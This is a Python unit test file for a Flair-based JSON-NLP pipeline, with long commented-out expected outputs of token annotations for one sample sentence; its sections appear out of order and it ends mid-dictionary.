'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VB', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_multi(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'multi'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'entity': 0, 'xpos': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'entity_iob': 'O'}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'entity_iob': 'O'}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [])])])])
# assert actual == expected, actual
def test_invalid_language(self):
with pytest.raises(TypeError):
FlairPipeline().process(text, lang='martian')
def test_validation(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en'))
class TestFlairEmbeddings(TestCase):
def test_no_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=False, bpe_size=0)
assert all(map(lambda t: 'embeddings' not in t, actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_default_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='default', char_embeddings=False, bpe_size=0)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair glove,multi-forward,multi-backward',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_character_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=True, bpe_size=0)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair ,char',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_bpe(self):
actual = FlairPipeline().process(text, lang='en', fast=True, use_embeddings='', char_embeddings=False, bpe_size=50)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair ,byte-pair_50',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=False, bpe_size=50)
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='en', bpe_size=45)
def test_invalid(self):
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='martian', char_embeddings=False, bpe_size=0)
def test_validation_default(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en', use_embeddings='default'))
def test_validation_bpe(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en', bpe_size=50))
def test_validation_chars(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en', char_embeddings=True))
| from collections import OrderedDict
from unittest import TestCase
from pyjsonnlp import validation
from flairjsonnlp import FlairPipeline
from . import mocks
import pytest
text = "Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash."
def strip_scores(j):
"""Scores are non-deterministic"""
for s in j['documents'][1]['sentences']:
for label in s.get('labels', []):
label['scores']['label'] = 0
for e in j['documents'][1]['expressions']:
e['scores']['type'] = 0
for t in j['documents'][1]['tokenList']:
t['scores']['upos'] = 0
t['scores']['xpos'] = 0
t['scores']['entity'] = 0
if 'synsets' in t:
t['synsets'][0]['scores']['wordnetId'] = 0
class TestFlair(TestCase):
def test_process(self):
actual = FlairPipeline().process(text, fast=False, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VB', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'crash.v.01', 'scores': {'wordnetId': 0}}]}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_fast(self):
actual = FlairPipeline().process(text, fast=True, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': '.', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_ontonotes(self):
actual = FlairPipeline().process(text, fast=True, use_ontonotes=True)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 